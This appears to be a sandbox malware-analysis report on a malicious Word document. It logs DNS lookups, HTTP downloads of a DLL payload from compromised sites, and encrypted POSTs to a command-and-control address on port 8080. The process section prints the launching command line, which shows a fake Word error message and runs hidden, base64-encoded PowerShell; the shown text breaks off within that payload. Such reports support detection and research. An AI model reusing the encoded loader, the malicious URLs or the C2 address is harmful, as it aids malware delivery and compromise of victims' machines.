                            Stream Path:WordDocument
                            File Type:data
                            Stream Size:43108
                            Entropy:3.69797214633
                            Base64 Encoded:False
                            Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8c a3 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a8 00 00 70 61 21 5c 70 61 21 5c 8c 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            12/21/20-22:13:15.856399TCP1201ATTACK-RESPONSES 403 Forbidden8049169191.6.208.18192.168.2.22

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 21, 2020 22:13:12.560796022 CET49167443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.692061901 CET4434916735.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:12.692158937 CET49167443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.704186916 CET49167443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.835093021 CET4434916735.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:12.835493088 CET4434916735.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:12.835526943 CET4434916735.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:12.835624933 CET49167443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.858838081 CET49167443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.860240936 CET49168443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.993155956 CET4434916735.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:12.994159937 CET4434916835.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:12.994260073 CET49168443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:12.994632006 CET49168443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:13.125109911 CET4434916835.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:13.125260115 CET4434916835.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:13.125377893 CET4434916835.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:13.125458002 CET49168443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:13.127383947 CET49168443192.168.2.2235.208.182.43
                            Dec 21, 2020 22:13:13.257812977 CET4434916835.208.182.43192.168.2.22
                            Dec 21, 2020 22:13:15.433027983 CET4916980192.168.2.22191.6.208.18
                            Dec 21, 2020 22:13:15.644037008 CET8049169191.6.208.18192.168.2.22
                            Dec 21, 2020 22:13:15.644223928 CET4916980192.168.2.22191.6.208.18
                            Dec 21, 2020 22:13:15.644448042 CET4916980192.168.2.22191.6.208.18
                            Dec 21, 2020 22:13:15.855180979 CET8049169191.6.208.18192.168.2.22
                            Dec 21, 2020 22:13:15.856399059 CET8049169191.6.208.18192.168.2.22
                            Dec 21, 2020 22:13:15.897656918 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.064846039 CET4916980192.168.2.22191.6.208.18
                            Dec 21, 2020 22:13:16.136296034 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.136451006 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.136646986 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.375519991 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421824932 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421868086 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421886921 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421905041 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421916008 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.421921015 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421936989 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421952963 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421953917 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.421964884 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421977997 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.421983004 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.421994925 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.422004938 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.422035933 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.660849094 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.660887957 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.660921097 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.660938025 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661070108 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661088943 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661113977 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661153078 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661200047 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661216974 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661232948 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661247969 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661268950 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661269903 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661287069 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661299944 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661307096 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661329985 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661334038 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661349058 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661365032 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661387920 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661425114 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661447048 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661464930 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661482096 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.661493063 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661515951 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.661613941 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.899832010 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.899863005 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.899876118 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.899892092 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900080919 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.900336027 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900356054 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900418997 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900435925 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.900506973 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900537968 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900578022 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900578976 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.900638103 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.900760889 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900778055 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900796890 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900814056 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900835991 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900840998 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.900852919 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900873899 CET8049170186.64.117.145192.168.2.22
                            Dec 21, 2020 22:13:16.900873899 CET4917080192.168.2.22186.64.117.145
                            Dec 21, 2020 22:13:16.900892973 CET8049170186.64.117.145192.168.2.22

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 21, 2020 22:13:12.406024933 CET5219753192.168.2.228.8.8.8
                            Dec 21, 2020 22:13:12.544753075 CET53521978.8.8.8192.168.2.22
                            Dec 21, 2020 22:13:13.190706968 CET5309953192.168.2.228.8.8.8
                            Dec 21, 2020 22:13:14.192848921 CET5309953192.168.2.228.8.8.8
                            Dec 21, 2020 22:13:15.206845045 CET5309953192.168.2.228.8.8.8
                            Dec 21, 2020 22:13:15.432238102 CET53530998.8.8.8192.168.2.22
                            Dec 21, 2020 22:13:15.864443064 CET5283853192.168.2.228.8.8.8
                            Dec 21, 2020 22:13:15.897011995 CET53528388.8.8.8192.168.2.22

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Dec 21, 2020 22:13:12.406024933 CET192.168.2.228.8.8.80xad13Standard query (0)www.isatechnology.comA (IP address)IN (0x0001)
                            Dec 21, 2020 22:13:13.190706968 CET192.168.2.228.8.8.80x959bStandard query (0)arquivopop.com.brA (IP address)IN (0x0001)
                            Dec 21, 2020 22:13:14.192848921 CET192.168.2.228.8.8.80x959bStandard query (0)arquivopop.com.brA (IP address)IN (0x0001)
                            Dec 21, 2020 22:13:15.206845045 CET192.168.2.228.8.8.80x959bStandard query (0)arquivopop.com.brA (IP address)IN (0x0001)
                            Dec 21, 2020 22:13:15.864443064 CET192.168.2.228.8.8.80x82b3Standard query (0)transfersuvan.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Dec 21, 2020 22:13:12.544753075 CET8.8.8.8192.168.2.220xad13No error (0)www.isatechnology.comisatechnology.comCNAME (Canonical name)IN (0x0001)
                            Dec 21, 2020 22:13:12.544753075 CET8.8.8.8192.168.2.220xad13No error (0)isatechnology.com35.208.182.43A (IP address)IN (0x0001)
                            Dec 21, 2020 22:13:15.432238102 CET8.8.8.8192.168.2.220x959bNo error (0)arquivopop.com.br191.6.208.18A (IP address)IN (0x0001)
                            Dec 21, 2020 22:13:15.897011995 CET8.8.8.8192.168.2.220x82b3No error (0)transfersuvan.com186.64.117.145A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • arquivopop.com.br
                            • transfersuvan.com
                            • 50.116.111.59
                              • 50.116.111.59:8080

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.2249169191.6.208.1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampkBytes transferredDirectionData
                            Dec 21, 2020 22:13:15.644448042 CET2OUTGET /index_htm_files/Kxh/ HTTP/1.1
                            Host: arquivopop.com.br
                            Connection: Keep-Alive
                            Dec 21, 2020 22:13:15.856399059 CET2INHTTP/1.1 403 Forbidden
                            Date: Mon, 21 Dec 2020 21:13:15 GMT
                            Server: Apache
                            Content-Length: 380
                            Keep-Alive: timeout=5, max=500
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.2249170186.64.117.14580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampkBytes transferredDirectionData
                            Dec 21, 2020 22:13:16.136646986 CET3OUTGET /wp-admin/OVl/ HTTP/1.1
                            Host: transfersuvan.com
                            Connection: Keep-Alive
                            Dec 21, 2020 22:13:16.421824932 CET4INHTTP/1.1 200 OK
                            Date: Mon, 21 Dec 2020 21:13:16 GMT
                            Server: Apache
                            X-Powered-By: PHP/7.3.25
                            Cache-Control: no-cache, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 21 Dec 2020 21:13:16 GMT
                            Content-Disposition: attachment; filename="VBPm8FW3p7u5myvvSEb.dll"
                            Content-Transfer-Encoding: binary
                            Set-Cookie: 5fe10fec49af3=1608585196; expires=Mon, 21-Dec-2020 21:14:16 GMT; Max-Age=60; path=/
                            Strict-Transport-Security: max-age=63072000; includeSubdomains;
                            Upgrade: h2,h2c
                            Connection: Upgrade, Keep-Alive
                            Last-Modified: Mon, 21 Dec 2020 21:13:16 GMT
                            Vary: Accept-Encoding
                            Cache-Control: public
                            Keep-Alive: timeout=2, max=1000
                            Transfer-Encoding: chunked
                            Content-Type: application/octet-stream
                            Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 45 54 b3 f3 01 35 dd a0 01 35 dd a0 01 35 dd a0 1f 67 48 a0 10 35 dd a0 1f 67 5e a0 64 35 dd a0 1f 67 59 a0 2b 35 dd a0 26 f3 a6 a0 06 35 dd a0 01 35 dc a0 80 35 dd a0 1f 67 57 a0 04 35 dd a0 1f 67 4f a0 00 35 dd a0 1f 67 49 a0 00 35 dd a0 1f 67 4c a0 00 35 dd a0 52 69 63 68 01 35 dd a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9a e7 e0 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 ac 00 00 00 c8 02 00 00 00 00 00 6d 33 00 00 00 10 00 00 00 c0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 03 00 00 04 00 00 9f f6 03 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 ec 00 00 49 00 00 00 a8 e5 00 00 3c 00 00 00 00 20 01 00 d8 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 03 00 18 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 dc 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 57 ab 00 00 00 10 00 00 00 ac 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 29 2d 00 00 00 c0 00 00 00 2e 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 2c 00 00 00 f0 00 00 00 12 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 6c 02 00 00 20 01 00 00
                            Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$ET555gH5g^d5gY+5&555gW5gO5gI5gL5Rich5PEL_!m3I< l@D.textW `.rdata)-.@@.datax,@.rsrcl


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.224917450.116.111.598080C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            Dec 21, 2020 22:14:34.059856892 CET240OUTPOST /zikye087/k6io5sui3jj27i90cer/zipbonjrmr/ HTTP/1.1
                            DNT: 0
                            Referer: 50.116.111.59/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/
                            Content-Type: multipart/form-data; boundary=------------qm4wTQVJYgof
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: 50.116.111.59:8080
                            Content-Length: 8420
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Dec 21, 2020 22:14:35.342483997 CET250INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Mon, 21 Dec 2020 21:14:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Vary: Accept-Encoding
                            Data Raw: 62 63 34 0d 0a 5b 4f 78 67 1d 8d 4d 4a f3 ad 08 9b ca 31 01 7a 2a ad fb 68 28 15 62 b8 0a 88 90 7b c9 79 7f b6 8f 33 3f cf e2 cb 9e ad 80 ae 7d cb d1 0d 99 42 2e b2 7e e4 7d d6 d9 ec ae ad ae a7 25 fe 3d 91 02 f7 ec 2b 04 23 a7 e2 9c 86 ad 99 a3 87 39 27 91 25 46 86 98 91 ce be 17 0d 73 ff 90 96 6e 32 60 a0 7f 0d 82 03 dd 56 5c 59 6d 69 de b2 b6 c0 ef ab 3a 89 9e b2 e2 f7 fd 65 60 57 d2 6a 70 67 35 f0 93 62 5c a3 85 80 65 f9 83 5c cc 28 42 8f 17 4b 2d 96 ef 69 82 50 77 c3 01 33 36 32 64 91 dd f5 72 72 80 15 01 46 2a 78 98 b8 d9 76 2d 28 d8 73 38 0d ba c0 07 2f 44 2b db 18 2d 15 09 d8 f3 4c ba af b7 12 77 38 a3 d5 18 f0 37 8f ce 2a fc a2 4f c1 0c 36 77 a0 32 f2 3c d2 af d1 0d 12 45 17 3e da 2b a0 a2 81 e3 32 00 d2 04 77 0c 21 11 3e 3f ef 8f e3 ea e5 5d 50 26 a1 d3 56 8a 3e 60 54 ab e3 b3 37 c5 f7 74 08 28 88 ac 90 27 1c af 16 d6 34 fe 08 00 d2 15 3b f7 f1 bc a2 54 7c a2 70 c2 1b 57 f1 f6 a8 61 c4 a0 84 6c f7 58 32 58 9c 04 0e 12 4c 22 a9 98 1a ac cb 1a e1 32 4b 69 b9 4d f0 8a d9 cf af 69 ca 89 62 72 3c de 29 6e 97 0a 91 ed 36 d8 4b f1 15 01 44 3b b6 1d 64 a2 52 ed 65 ea 20 01 5b 9b b4 61 9d cc 59 a6 4c 8d 8e c3 e9 8d 40 d3 60 4c 19 a3 fe af 51 f1 bc c7 7b 6b b6 33 e7 02 fe 5a 74 3b 57 dc 02 5f 5c bd 1e 5b e3 4b 81 b4 af dc cb bd 82 ef 8c e1 2d ac cf 21 16 2e 66 1a 08 34 f7 91 fb f6 31 f3 9d 3a ff 38 d0 f4 80 eb 19 b6 02 49 c8 8e 51 58 7a 7c aa cf e0 7f 44 4c e3 7b ad 24 a5 48 d9 53 70 1a 2f 2d 6d 88 bb ac 37 35 e0 2a b0 b8 f3 3f 2f 22 fd 60 c0 cc f2 b1 ea 20 ef 4d 49 83 ac 8c 34 ca 02 95 e4 ba 59 16 49 97 72 11 de 50 e0 52 9c 07 8c 28 d1 57 6f 6d f9 69 a5 9c e3 20 f3 8f 8f fa 8a bd 20 21 58 e4 27 e8 b7 e8 61 92 35 84 6a c4 9e 71 63 91 cc b8 81 6b 18 39 f7 c4 ca bb 09 53 04 2e 2d 10 3b 8a a1 7c 31 a7 a1 7f 7e c4 6b 0b 25 34 6b 93 d9 64 f8 90 e7 ea e5 f7 f5 04 a3 00 d5 18 f0 40 75 9c 3c 86 97 ee 0e fe d9 54 50 13 d5 cc 71 2b 2b c6 9d 19 d7 f9 49 5a e7 b1 fb 9f bc 63 bf 7b cf 35 51 46 ed 8b 4f 4c 27 fc 68 c4 03 95 af e0 3b e6 19 d7 1b bb f6 50 30 f6 8a a4 68 6c fd ac 39 66 57 e8 30 b0 27 01 87 6a be 28 62 00 e9 83 25 4f 58 79 f1 17 f9 40 c2 18 ca c3 16 e5 71 60 cc 80 17 b0 b7 42 c2 e0 61 dd a3 d8 e6 0d 0c c7 66 d4 d2 29 c3 fd 6a e0 5d e1 65 1a 31 12 4e 98 d0 1c a6 cb 0f c8 b7 f3 21 f1 60 18 3b 30 f4 9e cb 4b 46 3d 92 45 c8 5f ea 7b b5 c1 0a 0b 17 c4 6f a5 8f 55 bc 8e 85 24 dc 83 37 e3 ac e8 23 3f 8f b2 0c da 7c af ac 82 c3 f6 2d eb 2b 4a b4 2e 6d 75 71 7a b6 24 41 d3 3a cc 1c 4f 71 cc fe 77 e5 7a c7 d7 34 78 06 2f 92 05 b6 73 b3 98 12 a5 05 6a 85 28 36 48 ee 15 f8 b0 7a 27 2c b0 ec 95 47 4b 97 f5 39 10 92 5d 01 1d 9b e3 45 a6 e0 2d b5 41 ce cc 5f 87 72 95 d3 84 17 81 a5 71 62 c5 3f ca 83 f3 1f 9e d6 b0 b0 79 99 f7 b6 0f 20 57 2a 0f 54 25 8c 52 a4 02 53 54 01 4f 75 fd c2 aa f3 7d 22 57 a9 14 2f be 42 b0 fc 57 10 4e 68 5c f9 49 9a db 61 a6 8c 07 02 a4 23 ce 40 87 00 1a 53 b6 ec 89 f0 ed aa f2 56 87 fd 49 fa eb 7d 2a a9 52 de ff 27 ad 80 22 b6 59 c4 61 70 7c 4b f5 bf 48 92 c2 c6 96 08 5b 40 6a 43 db 6e dc 5f 36 85 4a 87 57 84 90 06 62 ef 4f 08 69 c6 30 3d 7c 91 62 25 94 37 2d 1d 9e d7 02 d7 c9 91 d9 43 3a 9e 32 e8 bc 8c 2c 38 3c 73 87 3b 4c c0 e3 6f ed df dd e0 61 9b 46 37 30 32 e1 82 01 a9 d1 49 c3 e2 56 af d6 18 da fb d9 ee f2 9a 77 27 3a ac 0b b0 e5 b3 34 fa 34 26 5e aa eb 76 3f 8d d3 13 34 a5 61 a4 cc cd 08 7a f7 f7 a2 13 8f 3f 03 8a 96 ea 52 13 a9 d5 7a 79 cf 37 ea 22 99 0e 19 ee 7e a0 22 1a 81 4d 3f 57 f2 f2 92 f0 91 cd b5 a5 0e 85 91 db 71 2d 31 b2 18 3d eb 25 bb cd 42 54 67 61 2d 7c d2 ba 53
                            Data Ascii: bc4[OxgMJ1z*h(b{y3?}B.~}%=+#9'%Fsn2`V\Ymi:e`Wjpg5b\e\(BK-iPw362drrF*xv-(s8/D+-Lw87*O6w2<E>+2w!>?]P&V>`T7t('4;T|pWalX2XL"2KiMibr<)n6KD;dRe [aYL@`LQ{k3Zt;W_\[K-!.f41:8IQXz|DL{$HSp/-m75*?/"` MI4YIrPR(Womi !X'a5jqck9S.-;|1~k%4kd@u<TPq++IZc{5QFOL'h;P0hl9fW0'j(b%OXy@q`Baf)j]e1N!`;0KF=E_{oU$7#?|-+J.muqz$A:Oqwz4x/sj(6Hz',GK9]E-A_rqb?y W*T%RSTOu}"W/BWNh\Ia#@SVI}*R'"Yap|KH[@jCn_6JWbOi0=|b%7-C:2,8<s;LoaF702IVw':44&^v?4az?Rzy7"~"M?Wq-1=%BTga-|S


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:22:12:36
                            Start date:21/12/2020
                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                            Imagebase:0x13f9f0000
                            File size:1424032 bytes
                            MD5 hash:95C38D04597050285A18F66039EDB456
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:22:12:40
                            Start date:21/12/2020
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwA